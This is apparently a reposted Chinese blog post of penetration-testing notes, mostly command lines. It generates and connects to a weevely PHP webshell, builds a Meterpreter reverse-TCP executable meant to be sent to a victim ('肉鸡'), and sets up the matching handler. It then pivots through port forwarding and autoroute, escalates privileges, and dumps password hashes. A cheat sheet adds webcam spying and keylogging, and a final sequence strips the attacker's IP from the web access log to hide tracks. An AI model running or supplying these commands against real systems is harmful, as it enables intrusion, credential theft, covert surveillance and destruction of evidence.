zoukankan      html  css  js  c++  java
  • 简单渗透工具使用

    上传木马

    windows上一般使用菜刀实现一句话木马的控制,在linux平台下,也存在类似的工具,如weevely

    使用weevely 生成木马php后上传后再用其连接

    weevely generate test hello.php                   生成的文件在/usr/share/weevely/hello.php
    weevely http://192.168.0.103/DVWA-master/hackable/uploads/hello.php test          (weevely  URL   pass)

    使用metersploit

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.201.100 LPORT=6666 -f exe > 6666.exe  生成木马发给肉鸡

    主机设置meter脚本

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.201.100
    set LPORT 6666
    exploit

    肉鸡上点击该程序,实现连接

    以此为跳板:

    链接一个端口
    portfwd add -l 2222 -r 192.168.201.101 -p 3389
    netstat -an | grep "2222" 验证本地是否开启了监听状态
    rdesktop 127.1.1.0:2222 连接上

    建立路由
    run autoroute -s 192.168.201.101(内网机)
    run autoroute -p
    getsystem
    run hashdump
    background 挂起当前会话
    接下来可以开始扫描相应端口并测试,使用set RHOST 192.168.201.101

    附meterpreter常用命令:
    getsystem #会自动利用各种各样的系统漏洞来进行权限提升
    migrate #进程id进程迁移
    background #把当前的会话设置为背景,需要的时候在启用
    getuid #查看对方正在运行的用户
    ps #列出所有的进程
    getpid #返回运行meterpreter的id号
    sysinfo #产看系统信息和体系结构
    shell #切换到cmd的系统权限方式
    exit #退出shell会话返回meterpreter或终止meterpreter
    getdesktop 截取目标主机当前桌面会话窗口
    run webcam -p /var/www #在/var/www目录监控目标主机的摄像头
    keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

    观察日志信息

    cd /opt/lampp/logs
    grep access.log -v 我们的IP -output cleaned.log 过滤网络行为
    rm access.log
    cp cleaned.log access.log
    rm cleaned.log

    其他

    linux下临时设置IP:ifconfig eth0 192.168.201.100 重启后失效

  • 相关阅读:
    mailServer Apache James / sendmail / qmail
    transactionServer IBM CICS / BEA Tuxedo
    java security / SSL / TLS / md5 / sha / base64 / rsa / des / aes / 3des / Blowfish
    growing
    framework osworkflow / jbpm
    8086CPU的16位寄存器
    寄存器AX
    寄存器AX
    8086CPU的16位寄存器
    8086CPU的8位寄存器数据存储情况
  • 原文地址:https://www.cnblogs.com/joeat1/p/10776553.html
Copyright © 2011-2022 走看看